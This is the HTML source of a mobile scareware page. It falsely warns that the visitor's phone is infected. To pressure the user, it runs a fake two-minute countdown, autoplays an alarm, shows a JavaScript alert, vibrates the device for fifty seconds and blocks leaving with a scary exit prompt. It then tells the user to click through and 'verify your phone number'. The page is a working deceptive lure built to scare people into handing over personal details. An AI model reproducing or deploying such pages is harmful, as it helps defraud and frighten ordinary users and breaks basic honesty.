<!DOCTYPE html>
<html><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <!--<base href="">--><base href=".">    
    <meta name="viewport" content="user-scalable=no, initial-scale=1.0, maximum-scale=1.0, width=device-width">
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black">
    <title>WARNING!</title>
    <style>
         #timer p,
        p {
            color: #555;
        }

        #error,
        #timer {
            display: inline-block;
            float: left;
        }

            #timer p,
            .btn {
                font-weight: 700;
            }

        body {
            font-family: sans-serif;
        }

        a {
            text-decoration: none;
        }

        footer,
        header,
        section {
            clear: both;
        }

        * {
            margin: 0;
            padding: 0;
        }

        #wrapper {
            margin: 0 auto;
            max-width: 400px;
            border: 0px solid #303030;
            border-radius: 0px;
        }

        h1 {
            font-size: 20px;
        }

        p {
            font-size: 14px;
            padding: 5px 0;
        }

        #timer {
            max-width: 410px;
            width: 100%;
        }

            #timer p {
                font-size: 12px;
            }


            #error img {
                width: 100%;
            }

        .btn {
            background-color: #1B2132;
            border-radius: 5px;
            color: #fff;
            display: block;
            line-height: 50px;
            max-width: 275px;
            width: 90%;
        }

        .red {
            color: red;
        }

        .container {
            padding-left: 8px;
            padding-right: 8px;
        }
    
    </style>
</head>
        
<body >
    <div id="wrapper">
       <div class="container">
            <header><img style="width:100%" src="./index_files/logo.png"> </header>
            <section>
                <h1>Your Phone might be infected</h1>
            </section>
            <section>
                <div id="timer">
                    <p>
                        <span class="red">
                            Viruses can damage file system, apps and could lead to lost of contacts
                        </span>
                    </p>
                    <p> </p><span style="font-size: 20px; font-weight: bold; color: red; font-family: sans-serif;" id="theTime">You have exactly two minutes and 55 seconds to check your phone for viruses</span>
                    <br>
                    <p> </p>
            </section>
            <section>
                <p>
                    <b>How to clean your phone</b>
                    <br>
                    <br><strong>Step 1: Click on the button below and go to the next page.</strong>
                    <br>
                    <br><strong>Step 2: Verify your phone number.</strong>
                </p>
                <p></p>
            </section>
            <footer>
                <p align="center">
                    <a class="btn" href="https://www.google.com/">Check phone!</a>
                </p>
            </footer>
        </div>
        <audio autoplay="autoplay" preload=""> 
            <source src="alert.mp3" type="audio/mpeg"> 
        </audio>
    </div>

        <script language="JavaScript" type="text/javascript">
            var sec = 59;
            var min = 02;
            var sd;
            function countDown() {
                sec--;
                if (sec === -01) {
                    sec = 59;
                    min = min - 1;
                } else {
                    min = min;
                }
                if (sec <= 9) {
                    sec = "0" + sec;
                }
                var time = (min <= 9 ? "" + min : min) + " minutes and " + sec + " seconds to check your phone for viruses.";
                if (document.getElementById) { 
                document.getElementById('theTime').innerHTML = "You have exactly " + time; 
            } 
 
            SD = window.setTimeout("countDown();", 1000); 
            if (min == '00' && sec == '00') { 
                sec = "00"; 
                window.clearTimeout(SD); 
            } 
        } 
        window.onload = countDown; 
        // --> 
    </script>
        <script type="text/javascript"> 
        alert("WARNING! \n\n The phone could be infected by viruses! \n\n Continue with instructions to repair the phone."); 
    </script>
    <script>
    navigator.vibrate = navigator.vibrate || navigator.webkitVibrate || navigator.mozVibrate || navigator.msVibrate;
    navigator.vibrate([50000]);
    </script>
        <script type="text/javascript"> 
      var PreventExitPop = true; 
      function ExitPop() {
        if(PreventExitPop != false) 
        {
            return "Leaving this page seriously risk losing all your data and files on your phone! \n\n *** out at your own risk.***";
        }
      }window.onbeforeunload = ExitPop; 
     </script>


</body></html>